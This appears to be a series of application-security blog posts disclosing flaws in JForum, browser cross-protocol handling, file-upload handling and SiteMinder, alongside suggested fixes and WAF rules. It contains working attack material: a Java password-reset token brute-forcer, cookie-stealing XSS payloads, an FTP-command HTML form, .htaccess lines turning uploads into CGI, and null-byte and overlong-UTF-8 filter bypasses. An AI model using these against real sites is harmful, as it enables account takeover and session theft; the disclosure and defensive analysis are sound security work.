because arshan’s too cheap to license OneNote


The application I beat up for the ESAPI WAF preso at OWASP AppSec DC was JForum. It’s awesome, free, open source forum software that is quite popular (CBS, EA and the Ukrainian government seem to like it). That aside, it’s got serious security problems. I disclosed these problems to them, um, around a month ago or so, and some of these vulns are interesting for one reason or another, so I thought it’d be good to highlight a few here.

Vuln #1: Hijack accounts with “Forgot Password” token prediction

You don’t have to be Nate Lawson to discover this obvious security flaw, which from a blind test may appear secure.

The “forgot password” feature suffers from a critical design error. The application allows users to automatically reset their password through a “lost password” form. That form only requires a user to enter an email address or username. When the form is submitted, the application sends an email containing a token to the associated user’s email address. When the user clicks on the link with the token in it from the email, the server will then allow the user to reset their password through a form. In this design, the token is acting as a temporary password for the user. Therefore, if an attacker can predict the value of the token the application will generate, they will be able to reset account passwords for other users.

Unfortunately, this scenario is possible. The following code is from, starting at line 671:

public User prepareLostPassword(String username, String email)
{
    // ...
    String hash = MD5.crypt(user.getEmail() + System.currentTimeMillis());
    um.writeLostPasswordHash(user.getEmail(), hash);
    // ...
}

As can be seen in the code snippet, the secret token is an unsalted hash of the user’s email address and the number of milliseconds since the epoch. Neither of these pieces of information qualify as secrets in a strong cryptosystem. All that is needed to reset a user’s password to a password of the attacker’s choosing is the email address of the victim and the ability to generate a few thousand requests.
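To make the brute force concrete, here is a hedged sketch of the candidate enumeration an attacker could perform. It assumes JForum's MD5.crypt() is a plain hex-encoded MD5; the class and method names below are mine, not JForum's:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.ArrayList;
import java.util.List;

public class TokenGuesser {

    // Hex-encoded MD5, assumed to mirror what JForum's MD5.crypt() produces.
    static String md5Hex(String input) {
        try {
            MessageDigest md = MessageDigest.getInstance("MD5");
            byte[] digest = md.digest(input.getBytes(StandardCharsets.UTF_8));
            StringBuilder sb = new StringBuilder();
            for (byte b : digest) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    // Enumerate every candidate token for a window of timestamps around
    // the moment the "lost password" form was submitted.
    static List<String> candidateTokens(String email, long approxMillis, long windowMillis) {
        List<String> candidates = new ArrayList<>();
        for (long t = approxMillis - windowMillis; t <= approxMillis + windowMillis; t++) {
            candidates.add(md5Hex(email + t));
        }
        return candidates;
    }

    public static void main(String[] args) {
        // A +/- 2 second guess of the server clock yields only a few
        // thousand candidates to submit to the reset form.
        List<String> tokens = candidateTokens("victim@example.com", System.currentTimeMillis(), 2000);
        System.out.println(tokens.size() + " candidate tokens to try");
    }
}
```

If the server leaks its clock (as JForum does), the window – and therefore the number of requests – shrinks dramatically.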

An exploit was made to demonstrate this vulnerability. It’s currently tuned to attack a local development environment, but it can be used to attack any site by changing a few variables (and adding a time difference offset). Since the application leaks the server’s time in several places, it’s possible to increase the efficiency of the exploit so that remote systems only require a few hundred packets. The exploit is available here.

Vuln #2: The first and last interesting XSS flaw in the world

JForum has a reflected XSS flaw whose exploitation is uniquely non-trivial. To start: in my development environment, this URL causes an alert box to pop up, containing my session cookies:


This is an interesting story, and the reason this fires is complex, as far as XSS goes. First, that type of URL won’t normally be found in JForum. The typical URL structure is RESTful. For example, the URL to list the recent posts in a category would look something like this:


This is parsed by JForum into a “module” and an “action”. The “recentTopics” substring represents the “module” of this URL, and “list”, the “action.” However, there is an alternative and possibly legacy representation for URLs that is honored by JForum, where URLs look like this:


The “servlet” substring in this URL is arbitrary, since JForum’s main engine catches all requests aimed at “*.page” and handles them identically based on parameters. This will end up making an attack signature difficult, as will be shown later.

Normally, no user input in JForum is rendered without encoding. The text being output in this example is being done so by Freemarker, the templating system used by JForum. Because the template to execute is supplied by the user (the ‘js’ parameter), the user can choose any file on the target filesystem. If the file is not a pre-approved template, the application will error without doing anything necessarily beneficial to the attacker. The only alternative, then, is to provide a template that the application won’t have correct contextual data for. This will happen, for instance, when a normal user attempts to view an admin template. When the expected data isn’t found this will inevitably cause a problem, after which Freemarker will print an error message that contains the filename being executed, along with other data which is not controlled by the user.

So, the only way for this to be useful is if the filename contained an attack. How could the filename be both an attack and a valid template location? This is about the time a normal developer would cry theoretical and reject the vulnerability. Unfortunately for them, by supplying the null byte followed by a traditional XSS payload after the template location, we can make both JForum/Freemarker and the attacker happy. When JForum/Freemarker look up the filename, the file system will acknowledge that the file exists and is a pre-approved template. However, when the filename is printed out by Freemarker after the error occurs, it will echo the entire filename parameter, not just the part of the filename understood by the lower level APIs. Because the attack is part of the extended filename, it gets echoed to the browser, and the JavaScript fires.
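The string mismatch is easy to illustrate in plain Java. This is a sketch, not JForum code: the template path and payload below are made up, and cStringView() stands in for whatever NUL-terminated lower-level API performed the file lookup:

```java
public class NullByteDemo {

    // The portion of a string a NUL-terminated (C-style) API would see.
    static String cStringView(String s) {
        int nul = s.indexOf('\u0000');
        return nul == -1 ? s : s.substring(0, nul);
    }

    public static void main(String[] args) {
        // Hypothetical 'js' parameter: a real template path, then a null
        // byte, then the XSS payload.
        String jsParam = "templates/default/header.htm\u0000<script>alert(document.cookie)</script>";

        // The file lookup effectively resolves only this part, so the
        // template validates as pre-approved...
        System.out.println("File system sees: " + cStringView(jsParam));

        // ...while the error message echoes the whole Java string,
        // payload included.
        System.out.println("Error page echoes: " + jsParam);
    }
}
```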

This vulnerability could not exist without 3 combined failures of the OWASP Top 10: flawed error handling (printing detailed error information), direct object references (specifying arbitrary templates in the URL) and XSS. This is a credit to the code of Rafael Steil, the maintainer of JForum, who otherwise makes a (relatively) security conscious product.

Note: One might guess that the ability to specify an arbitrary template constitutes an elevation of privileges. The templates are read-only and are publicly available, since the forum software is OSS. For it to be useful, the application would first have to queue the relevant admin information into memory before processing the template. This would require a separate vulnerability.

For giggles, though, there are other XSS flaws that are much more vanilla:


Now, how do we fix these in the ESAPI WAF?

These were not the vulnerabilities I used in my demo because they were not very clean to fix with a WAF (of any kind, not just mine). Unfortunately, they were two of the most serious vulnerabilities.

The account hijacking vulnerability is not possible to stop with a WAF without IP-based throttling, which is butthurt. This is the case because the attack is possible unauthenticated, so there’s no way to differentiate between legitimate “forgot password” resets and attacks. Come to think of it, the WAF could also just prevent all access to that feature until you get the code fix in. Does that count?

It’s possible but annoyingly inefficient to signature the complicated XSS with a simple virtual patch rule. First you’d have to signature a substring of the URI to detect that particular module being executed and then also signature the “js” parameter to detect non-alphanumerics. Given the fact that JForum can have multiple URLs for executing the same functionality, this protection doesn’t give a whole lot of assurance.
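As a rough illustration of what such a rule has to check (this is plain Java, not ESAPI WAF policy syntax; the class name and whitelist are mine):

```java
import java.util.regex.Pattern;

public class JsParamPatch {

    // Conservative whitelist of template-path characters for the 'js' parameter.
    private static final Pattern SAFE_TEMPLATE =
            Pattern.compile("^[a-zA-Z0-9_/.\\-]+$");

    static boolean allowed(String jsParam) {
        return jsParam != null
                && SAFE_TEMPLATE.matcher(jsParam).matches() // rejects <, >, quotes, null bytes
                && !jsParam.contains("..");                 // and path traversal
    }

    public static void main(String[] args) {
        System.out.println(allowed("templates/default/header.htm")); // legitimate template
        System.out.println(allowed("header.htm\u0000<script>alert(document.cookie)</script>")); // attack
    }
}
```

And you would still have to pin this rule to every URL form that reaches the same module, which is exactly the weakness described above.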

But wait, there’s less (security)

There are a ton more problems, like CSRF, unchecked redirects, no frame-breaking code and more. For the full writeup that I sent to the developers, click here.

The ESAPI project is quickly gaining steam. We’ve added a number of strong committers and there are many companies out there adopting it. My little addition to ESAPI was just released yesterday at OWASP AppSec DC, the ESAPI Web Application Firewall. Slides here.

You don’t need to implement the rest of ESAPI to use it, since it’s completely decoupled. It’s being published as part of ESAPI since virtual patches are an enterprise security need – and that’s what ESAPI is all about. The WAF was built for the Java version, but there’s nothing so specific to Java that would make it difficult to port to the other versions of ESAPI (assuming they have some BeanShell equivalent, which I think they all do).

What does the WAF offer? Well, a lot. It can stop all your normal injection attacks, like any WAF should. It’s closer architecturally to the application since it lives in a J2EE filter, and this allows it to do things a normal WAF can’t, like fix “business logic” vulnerabilities such as missing authentication or authorization.

It can also solve a number of “lesser” problems you’ll run into after a security assessment, like enforcing HTTPS, HTTP method restriction, or adding missing caching or content-type headers. You can also use it to perform fancy egress filtering, if you’re so inclined. All without touching a single line of code!

I can also make a strong case for performance, since the WAF doesn’t have to manage its own I/O or state – that’s all handled by the application server. The performance hit, especially if you’re not doing any crazy egress stuff where response data must be buffered, is minimal.

Anyway, it does way more than one blog post can do justice to. Check out the policy file configuration guide or the JavaDocs, and keep the ESAPI mailing list in the loop on your integration experience!

It’s available for download now as part of ESAPI 2.0 RC4.

UPDATE: kuza55 has pointed out correctly that the cookie-sharing across ports is universal; IE’s quirk is the port-ignorance during SOP checks.

Most people have thought about how you can use a browser to issue inter-protocol requests. See Samy’s version of SMTP-through-JavaScript, “cross-site” printing (cool, but what’s so cross-site about it again?), and this paper by NGS. However, the reverse attack is much more useful: causing a browser to interact with another protocol can result in arbitrary JavaScript running in the origin of a target domain. This is a natural extension of that previous work, starting with the seminal “form protocol attack” paper. After doing a bunch of research I found out that this basic idea was already lightly covered in eyeonsecurity’s “extended HTML form attack” paper, but it misses many key details, mostly because the browser security landscape has shifted significantly since it was written in 2002.

Let’s start from the beginning. First, this is going to be a corner case, to be sure, but the Internet is like Drake’s equation – there’s always going to be sites where unusual attacks work.

Where to start? Consider first that a browser won’t let you use HTTP to talk to any site on port 20 or 21 – the typical FTP ports. This means that if there is FTP running on any other port, you will be allowed to send requests to it. What if that FTP server responded? Well, you would think the response would be meaningless to the browser since it’s not valid HTTP.

The head-scratching behavior of browsers continues. None of the browsers I tested (IE, FF, Safari, Chrome, all recent versions) require HTTP response headers to process a request. I have no idea why that is, and it appears to be a very little-known fact according to some personal polling at Blackhat. If you want to see it in action, here’s your netcat command:

[root@i8jesus ~]# echo "<script>alert(document.cookie)</script>" > script.txt
[root@i8jesus ~]# nc -l 81 < script.txt

This opens up port 81 and pipes the script to any incoming TCP connection. Try pointing your browser at that port, e.g., http://localhost:81/foo. You’ll see the alert() does fire! This is more than just content sniffing, it’s protocol sniffing.

But even if you could control the output of another port on their server, you might initially be disappointed. In the minority browsers this will be an interesting but useless quirk because the port you’re connecting to (81) is not the same port of the target website (typically 80). Because of this, your browser will consider it a different origin and thus won’t let you do anything cool like access cookies or application data.

If you’re into browser security, you probably realize where this is going. IE, the dominant browser, ignores the port when considering DOM origin. This means that document.cookie is shared across ports on the same host. In IE7, the only thing you can’t do across ports is XmlHttpRequest, but don’t worry – IE8 is going to remove that restriction soon!

You can see here IE ignores the port, since it’s showing my WP cookies


Now let’s consider there’s an FTP server running on, port 81. You can interact with that FTP server with the following HTML. Notice the enctype='multipart/form-data'. This is what allows us to make our input look like FTP commands (as was seen in previous cross-protocol attacks).

<form method='POST' action='' enctype='multipart/form-data'>
<input type='text' name='doesntmatter' value='USER anonymous'>
<input type='text' name='doesntmatter' value='PASS'>
<input type='text' name='doesntmatter' value='HELP foo'>
<input type='submit'>
</form>

If an FTP server is running on port 81, the browser will connect to it and begin sending that multipart data. Let’s look at a real example of this happening and see how the FTP server understands the traffic. In order to facilitate this testing, I piped netcat output from my browser to a different netcat process connected to (I had to use myself as a MITM since they listen on a standard port). Here’s a snapshot of our traffic from the HTML form above:

Content-Type: multipart/form-data; boundary=---------------------------7d92b92a70534
Cookie: <snip>

Content-Disposition: form-data; name="doesntmatter"

USER anonymous

Content-Disposition: form-data; name="doesntmatter"


Since FTP separates commands by newline, the server will see a bunch of garbage commands with a few legitimate ones sprinkled in between. What the server sent in the response can be seen from the output of the netcat commands:

[root@i8jesus xps]# nc -l 81 | nc 21
220 Red Hat FTP server ready. All transfers are logged. (FTP) [no EPSV]
530 Please login with USER and PASS.
530 Please login with USER and PASS.
331 Please specify the password.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
230 Login successful.
550 Permission denied.
214-The following commands are recognized.
214 Help OK.
550 Permission denied.

As you can see, the FTP server at is clearly interpreting our HTTP traffic as separate FTP commands. Great, but now what? This is where previous attacks in the cross-protocol arena have ended. Most of the time this type of attack won’t profit the attacker much. How easy is it to go to Starbucks and issue those FTP commands yourself? It’s true that tricking the user into doing it may allow you to reach hosts behind firewalls and get around IP restrictions, but we can do better than that. So, put together what we’ve discovered so far:

1. Browsers will interpret non-HTTP responses
2. Browsers can communicate with non-HTTP servers as long as they reside on a non-standard port
3. FTP servers will interpret our commands line by line
4. IE ignores the port in origin checks

Here is the crux: we can issue FTP commands that the server will partially reflect back to the client. If this input contains JavaScript, the browser will execute it in the target origin. Let’s see what we can get some anonymous FTP servers out there to reflect back to us. The user input is in green and any interesting server output is in red:

[root@i8jesus xps]# telnet 21
Connected to
Escape character is '^]'.
220 FTP server (Version 6.00LS) ready.
500 H<SCRIPT>ALERT(DOCUMENT.COOKIE)</SCRIPT>: command not understood.
HELO <script>document.cookie)</script>
500 HELO <script>document.cookie)</script>: command not understood.

Looks like this server will upper-case the FTP command name during reflection. That will complicate things a bit (you can still exploit that with VBScript), but why not make things easier on ourselves and use the argument to HELO (an SMTP command that the FTP server doesn’t recognize), since that comes back without modification! Ok, now let’s test a .mil:

[root@i8jesus xps]# telnet 21
Connected to
Escape character is '^]'.
220 emissary FTP server (Use of this DoD computer system, authorized or unauthorized, constitues consent to monitoring of this system.  Unauthorized use may subject your to criminal prosecution.) ready.
HELO <script>
500 'HELO': command not understood by proxy
USER <script>alert(document.cookie)</script>
331 Password required for <script>alert(document.cookie)</script>.
PASS i dont want anything to do with you im just testing something dont rape me plz <3
530 Login incorrect.

This server reflects the USER argument. Simple, no authentication required.

Out of the few servers I’ve tested, it looks like vsFTPd is the safest in that it won’t reflect much data pre-authentication. (Un)fortunately, it looks like there are plenty of pre-authentication options and a few post-authentication options for reflecting data in most FTP servers. There are lots of FTP servers out there and lots of configurations to play with, resulting in an uncountable number of possibilities for vulnerability.

What this all means: running an FTP server on the same host as your site on a non-standard port probably makes you vulnerable to Type I XSS without you doing anything wrong. I don’t imagine it’s going to happen a lot, but I do imagine it’s going to happen.

The Solution

The solution, to me, is simple. Invoke your FindMimeFromData() equivalent on the HTTP response body, not the complete inbound TCP message. When did browsers decide to speak other protocols than HTTP? The specification doesn’t say the status line is optional. If I want to talk to an FTP server I’ll use WinSCP. Fair? Only give me shit that starts with “HTTP/1.X YYY”. It’s kind of ironic that IE processes the response successfully, but the response breaks Fiddler. Doesn’t Mr. Law, um, have a foot in both those camps?

It’s not an FTP problem

Yes, all of what I’ve said applies to other services as well. IE doesn’t block nearly as many ports as Firefox. For instance, here’s an interesting snippet from Cyrus (SMTP), which shows that exploitation is not necessarily brain-dead simple, and by the end you can see that there are enough characters to perform XSS.

[oasis@i8jesus ~]$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 ESMTP Postfix
HELO <script>alert(document.cookie)</script>
EHLO <script>alert(document.cookie)</script>
250 DSN
MAIL FROM: <script>alert(document.cookie)</script>
501 5.1.7 Bad sender address syntax
RCPT TO: <script>alert(document.cookie)</script>
503 5.5.1 Error: need MAIL command
555 5.5.4 Unsupported option: Blow
250 2.1.0 Ok
RCPT TO: <script>alert(document.cookie)</script>
501 5.1.3 Bad recipient address syntax
RCPT TO: sdf
550 5.1.1 <sdf>: Recipient address rejected: User unknown in local recipient table
RCPT TO: img src='javascript:alert(1)'
555 5.5.4 Unsupported option: src='javascript:alert(1)'
RCPT TO: img/src='javascript:alert(1)'
501 5.1.3 Bad recipient address syntax
RCPT TO: img/src=javascript:alert(1)
550 5.1.1 <img/src=javascript:alert>: Recipient address rejected: User unknown in local recipient table
RCPT TO: img/src=javascript:alert{}
550 5.1.1 <img/src=javascript:alert{}>: Recipient address rejected: User unknown in local recipient table
221 2.0.0 Bye
Connection closed by foreign host.
[oasis@i8jesus ~]$

Billy Hoffman and Matt Wood from HP presented on a new browser darknet at Blackhat, which of course the press went totally batshit for (the press love Billy et al. as much as they love anyone – or HP’s marketing department is insanely good). I love the idea of totally anonymous P2P information sharing, but it’s just not possible in the browser if we can’t use trusted plugins. In a truly safe P2P scheme the supernodes wouldn’t have to be trusted, but this is not the case in Veiled, as they were in fact willing to point out (and gloss over just as quickly :). The simple fact is that the supernodes deliver client-side code to the nodes – code that, when not compromised, contains JavaScript that will allow the user to perform all the functions necessary for a darknet, but when compromised, can be used to subvert all those same functions. As long as you’re getting your client side code from supernodes, it just can’t be done.

With all that aside, it’s still useful research (to me). The unknown compromise of a supernode is very unlikely, especially considering the overall incompetence on the part of those who would try to shut down a darknet. And to honor the spirit of the idea, I wanted to talk about some solutions to a few of the “challenges” they noted when architecting the design of their darknet:

Problem: When a user is on the darknet they store file slices in browser local storage, which is restricted by domain. Consider that a darknet client, Alice, is connected to supernode If the supernode goes down, the user must join a different supernode. The problem is: what happens to the file slices? They’re in local storage – which means when the user transfers to the next supernode,, the JavaScript won’t have access to the file slices.

Solution #1: They considered this a lost cause, but I think there are a couple of things you could do to retain the file slices without exposing the information to the new supernode, which clients shouldn’t have to trust. First, the initial request to go to the next supernode could be a POST request of the following format:

POST http://nextsupernode/reflect_files_back_to_me#hashoffiles


The server could then reflect the response for the clients to restore, complete with a hash to check (just for CRC). The second approach is slightly more complicated but allows for a general solution to the problem of “lost information” (like chat logs, keypairs, etc.) because of the origin-hopping.

Solution #2: Mallory, a user who isn’t on the darknet, tries to connect to Because her IP isn’t whitelisted, the DNS server for sends back wrong IP information (like the IP for maybe?) or refuses to resolve. Mallory therefore can’t connect to the darknet. Alice, a legitimate darknet user, connects to Because the darknet knows her IP address, the DNS server returns a legitimate response and allows her the chance to authenticate to the darknet, then redirects her to an alias –

The first thing the client-side code the darknet gives to Alice does is this:

> document.domain = '';

Alice then grabs some file slices in order to help everyone share the risk of getting DMCAwned. Now imagine supernode 'www1' gets burned. She gets kicked off the darknet and has to find a new supernode. Once she authenticates to the next supernode, she is redirected to a sequentially enumerated sub-domain, 'www2'. Because the next supernode is still a subdomain of the previous darknet domain, she can again execute the same code:

> document.domain = ''

Now she’ll have the same access to those files and the information is not lost – no need to go grab the new file slices because the old ones are still here in local storage!

Side notes
There is a pretty minor weakness in this approach – if a bad guy can hijack a supernode subdomain and trick her into visiting it (while her browser is still pinning the legitimate supernode IP address, otherwise any request to it would be redirected to a new, safe supernode), that bad guy can grab the local file slices with malicious code.

Also, using DNS as a control mechanism can probably also cause some darknet-fail due to its centralization, but you can always fall back to a less restrictive model when DNS is unavailable due to compromise. On top of that you can rotate authoritative nameservers much faster than in years past.


I’m sure you were totally riveted by that – in fact I’ll try to do more posts on improving the virtual defenses of a virtual darknet. There are other ways of improving it and plenty more ways to attack it, but the rest are even more boring than this. Hope you enjoyed Blackhat!

Using “Content-disposition: attachment” when streaming user-uploaded files is unfortunately incomplete protection against all cross-origin issues. Most savvy testers know that without it, a user could send a victim a link directly to a malicious uploaded file or <iframe> it in from their evil site, causing XSS & SSRF. When this header is sent down in response to a request, even if from an iframe, the browsers will force the user to download the file or cancel the request.

If they save and execute the file, they’re even more out of luck since locally privileged files are just as good as malware – but the forceful prompt is generally thought to be better than the definite risk posed by not sending the header. Bottom line: the header is something you should send.

Developers seem to know this, too. I encountered this header for a second time in recent months, and in a way I’d guess was partially motivated by security. Given that I don’t think a lot of people know why it’s not good enough alone, I thought I’d write something up here.

HTTP is to firewalls as Java is to Browser Security
If you can upload arbitrary files to a site that can stream them back to you with a permalink, you can use Java to XSS other users of the site if you can trick them into visiting your site. If you remember from the GIFAR problem that Java’s same-origin policy, like Flash’s, is backwards, the issue will be easy to understand. If you don’t remember, here’s Java’s SOP in a nutshell: Java applets are only allowed to interact with the host where they were downloaded from, not the context where they’re being executed. This is the opposite of the browser’s normal active content SOP. If you <script src=http://X/foo.js>, the context of execution will be the current page, not origin X.

With that in mind, consider the crux of my message today: Java ignores the Content-Disposition header. This means that if you can upload a class file or jar file to a site and that file can be permalinked, then you have cross-origin applet capabilities. Here’s the timeline of an attack, which is similar to that of a Type I POST XSS:

0. Mallory creates an evil applet that connects back to its host and issues a few key HTTP requests to change a profile email address
1. Mallory uploads the evil applet to
2. Somewhere else on the web, Alice logs into the site,
3. Somehow, Mallory tricks Alice into visiting her site,
4. gives Alice HTML that contains an <applet> tag that points back to Mallory’s evil applet on

<applet code='EvilClass' archive='http://victim/users/myuser/evilfile.jar'>

5. The evil <applet> executes with Alice’s ambient authentication, and changes her email address to one that Mallory owns
6. Mallory resets the password on the account and Alice’s new password is sent back to Mallory

I couldn’t find much record of Java’s ignorance of the Content-Disposition header. I see kuza55 & stefano mention this fact somewhat quietly in what appears to be an excellent RIA slidedeck, but there’s no mention of it in Java documentation, the Browser Security Handbook, or any other reference I could find.

Keep in mind, by the way, that Mallory doesn’t need to upload a file with a .class or .jar extension in order to include it remotely; she could also upload a file with an extension users are more likely to want, like .zip. Hell, you can probably store the serialized applet in any extension and invoke it with object=serializedApplet – I haven’t tested it and you shouldn’t be relying on extension checking for security, anyway.

The fix

The fixes, as always, are simple once you think about it in terms of what the application can do that the attacker can’t.

Fix #1: Require a POST to access the file. Although this is the least future-safe approach, it’s quick and it’s something you can make work in a WAF or in server configuration files. The attacker can’t force an <applet> tag to retrieve its content with a POST.

Fix #2: Require a CSRF-quality token when downloading the file. This will require a forwarding action to front access to the files, but it’s a sturdier approach, long term.
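The two fixes boil down to one decision per download request. Here is a minimal sketch of that decision as a plain function – names are hypothetical; in practice this would live in the J2EE filter or forwarding action fronting the uploaded files:

```java
public class UploadedFileAccess {

    // Decide whether a request for a user-uploaded file should be served.
    static boolean accessAllowed(String httpMethod, String sessionToken, String requestToken) {
        // Fix #1: <applet>, <script> and <iframe> tags can only issue GETs.
        if (!"POST".equals(httpMethod)) {
            return false;
        }
        // Fix #2: the CSRF-quality token minted into the session must match.
        return sessionToken != null && sessionToken.equals(requestToken);
    }

    public static void main(String[] args) {
        System.out.println(accessAllowed("GET", "abc123", "abc123"));  // blocked: wrong method
        System.out.println(accessAllowed("POST", "abc123", "abc123")); // served
    }
}
```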

Think before you save

Something else I’ve noticed – developers don’t think too creatively on defense when allowing users to control the names of their uploaded files. Aside from obvious null byte problems, developers are mostly smart enough to prevent files such as .php, .jsp, etc., from being stored, but they typically don’t think about other types of files that are also dangerous. Let’s imagine a site with the following structure for accessing user-provided files:


Here are 3 good questions to get you started thinking about alternate exploitation scenarios when testing file upload mechanisms:

1. Can users choose their own name during registration?

I’ll upload a file called ‘’ for my new user, ‘en-US’. The browser’s content sniffing will find the HTML in my file that has an unscary file extension and render it to my phishing victims the way I wanted. The Content-Disposition header stops this type of attack.

2. Have you considered files that have special meaning to web technologies?

I’ll upload my own application.cfc with whatever server-side code I want to execute (maybe an onRequestStart() request logger?)

If it’s not a ColdFusion app I could upload my own crossdomain.xml! Flash++!

If you don’t like Flash’s weird programming model you could just upload your own .htaccess, which allows you to do some cool shit – like force Apache to interpret a previously uploaded text file as a server-side CGI script with 2 lines:

Options +ExecCGI
AddHandler cgi-script txt

3. How good is that character validation of user-supplied file names, really?

Consider the old trick of ending a file name with ::$DATA on NT filesystems in order to get to the default data stream of a file without ending with the normal extension. Or maybe the application doesn’t canonicalize invalid Unicode, which you could abuse in countless ways – most notably because parameter.indexOf(“..”) == -1.
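The indexOf("..") pitfall is easy to demonstrate with ordinary double URL-decoding, which is analogous to the non-canonical Unicode case (the parameter value below is illustrative):

```java
import java.net.URLDecoder;

public class TraversalCheckDemo {

    // Decode once, wrapping the checked exception for convenience.
    static String decode(String s) {
        try {
            return URLDecoder.decode(s, "UTF-8");
        } catch (java.io.UnsupportedEncodingException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        // As the application receives it after the container's single decode:
        String param = "%2e%2e%2fetc%2fpasswd";

        // The naive check finds no ".." in the raw parameter...
        System.out.println("Naive check passes: " + (param.indexOf("..") == -1));

        // ...but any later layer that decodes again sees a traversal.
        System.out.println("After another decode: " + decode(param));
    }
}
```

The moral is the same as the text above: validate after full canonicalization, not before.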


Hopefully you got something useful out of that. For anyone else that’s here, I’m already in Vegas getting ready to teach before the con starts – Twitter me if you’re going to be around and want to drink a beer or grab some sushi! P.S. grab a seat for Jeff’s talk on malicious code – scary one for the CSO’s.

Last year Jeff Williams and I discovered 2 critical flaws in SiteMinder. Rather than just sitting on the flaws or leaving the client to report them, we decided to experiment with responsible disclosure with the company who manages SiteMinder, Computer Associates (CA). The process was painfully slow and from our perspective a little disrespectful. For months they kept asking for details about the product version and configuration – details that we told them we didn’t know and couldn’t provide without being a major annoyance to our customers. We repeated ourselves and kept pressing for them to fix it.

We repeatedly asked for status – considering the fixes should be relatively easy – and got very little information until now. The timelines in the responsible disclosure guidelines by Wysopal & Christey were obliterated by CA. We just got an email after months saying they had just tested their latest build (something we suggested they do on day one) and that the attacks appear not to work anymore.

This response, after thinking a bit, seems like an insult to my intelligence. The attacks have worked on every SiteMinder-protected application we’ve tested since last year. All of a sudden they decide it’s important, test their latest build, and it no longer works? Apply some critical thinking skills and ask yourself what is more likely:

  • They randomly fixed both of these vulnerabilities before we reported them. Keep in mind the following facts:
    • We are seeing the attacks work in the wild 24/7
    • There are no advisories regarding these vulnerabilities on their advisory blog
    • It took 6 months for them to “get around” to testing our 2 newly reported critical vulnerabilities
  • or…
  • They took our information, spent the last 6 months fixing the vulnerabilities quietly, and now have plausible deniability

So much for responsible disclosure.

The motivation for researchers to find flaws is credit. Credit is the currency we deal in. As gaz pointed out on Twitter, “bug hunting is fun”, but at the same time bug hunters are also providing an extremely valuable service and should be compensated in some way for the bugs they find. Credit to the researchers in a patch or advisory is the only currency that vendors have been willing to pay, especially for layer 7 bugs. You think ZDI’s paying me for my XSS?

So, since the bugs have been “fixed” we can now talk about them, right?

What is SiteMinder?
SiteMinder, for the uninitiated, is a security gateway that sits in front of 80-90% of corporate America’s J2EE applications. It’s used to provide authentication, URL authorization and XSS protection on GET requests.

Although it’s used to protect J2EE applications, SiteMinder itself is written in an unmanaged language.

Flaw #1: Complete XSS-defense Bypass Through Null-Byte Injection
Normally, passing almost any special characters in a GET request to SiteMinder will cause an error to occur. It’s practically impossible to XSS a SiteMinder application through a GET because of this. The user data must land inside a JavaScript context, unquoted attribute, or some other unusual scenario for exploitation to be possible. Passing data in via a POST is the low-tech way to do this, but it’s not ideal for reflected XSS.

Jeff was testing this mechanism and he tried prepending his payload with %00. SiteMinder didn’t see the attack because it recognized %00 as the end-of-string character. Here’s some text from our disclosure to them:

The following URL, which attempts to exploit a non-existent XSS vulnerability in a page, will be caught by SiteMinder’s XSS protection:


However, prepending the parameter value with a null byte directly will cause the parameter value to go unnoticed by the protection mechanism, as can be seen in the following URL:


This indicates that the code for parsing parameters is written in an unmanaged language like C or C++ and interprets the null byte as the end-of-string character. Unfortunately, Java considers the null byte just another part of the string, so what comes after it is used in the vulnerable page and the reflected XSS fires.
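The mismatch is easy to demonstrate with a hand-rolled stand-in for the C-side scan (SiteMinder’s real code is obviously not available, so this is only a sketch of the behavior):

```java
// Illustrative sketch: a C-style scanner treats '\0' as end-of-string and
// never sees what follows it; a Java String carries the NUL like any other char.
public class NullByteMismatch {

    // Stand-in for an unmanaged filter built on NUL-terminated strings.
    static boolean cStyleContains(String s, String needle) {
        int nul = s.indexOf('\0');
        String visible = (nul == -1) ? s : s.substring(0, nul);
        return visible.contains(needle);
    }

    public static void main(String[] args) {
        String payload = "\u0000<script>alert(1)</script>";

        System.out.println(cStyleContains(payload, "<script>")); // false: the gateway sees nothing
        System.out.println(payload.contains("<script>"));        // true: the Java app sees it all
    }
}
```

Everything before the NUL is the gateway’s whole world; everything after it is the application’s.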

Flaw #2: Complete XSS-defense Bypass Through Canonically Decomposable (aka “overlong”) Unicode
This one we anticipated would be harder to fix since it would require some architectural re-thinking. By passing an “overlong” version of a SiteMinder-blacklisted character (like %e0%80%bc for ‘<’) you could get the attack to pass SiteMinder’s check, which obviously worked at the byte or ASCII-character level. However, when the J2EE application server got a hold of the multi-byte character sequence it canonicalized the data into Unicode (Java uses UTF-16 under the hood). Here is some text from our disclosure to them:

There are a multitude of issues when interpreting UTF-8 in a gateway security mechanism. Invalid UTF-8 of all forms, including overlong UTF-8, using best-fit mappings and performing normalization can all cause problems. The following URL will be caught by SiteMinder because it contains a ‘<’.


However, passing the following URL will not trip the protection mechanism:


The seemingly random assortment of bytes (0xe080bc) is reduced to the ‘<’ character when it’s consumed into a Java String object, because the JVM understands and reduces this inappropriately long representation of a UTF-8 character. Strictly looking for the 0x3C byte to detect ‘<’ characters will always fail because of this, so the SiteMinder protection needs to be Unicode-aware. These issues are presented well in Unicode Technical Report #36, specifically in section 3.
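The arithmetic is easy to check for yourself. A strict decoder (including modern Java charset decoders) rejects the overlong form outright, but a lenient one that just masks and shifts the continuation bytes collapses 0xE0 0x80 0xBC straight to ‘<’. A hand-rolled sketch of such a lenient decode:

```java
// Deliberately lenient 3-byte UTF-8 decode with no overlong/range checks,
// to show how 0xE0 0x80 0xBC collapses to '<' (0x3C).
public class OverlongDecode {

    // 1110xxxx 10yyyyyy 10zzzzzz -> xxxx_yyyyyy_zzzzzz
    static char lenientDecode3(int b1, int b2, int b3) {
        return (char) (((b1 & 0x0F) << 12) | ((b2 & 0x3F) << 6) | (b3 & 0x3F));
    }

    public static void main(String[] args) {
        System.out.println(lenientDecode3(0xE0, 0x80, 0xBC) == '<'); // true
    }
}
```

No 0x3C byte ever crosses the wire, so a byte-level blacklist has nothing to match on.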

That’s our story. At the end of the day, we didn’t get credit from CA, but our bugs supposedly got fixed, so we’ll call it a push.

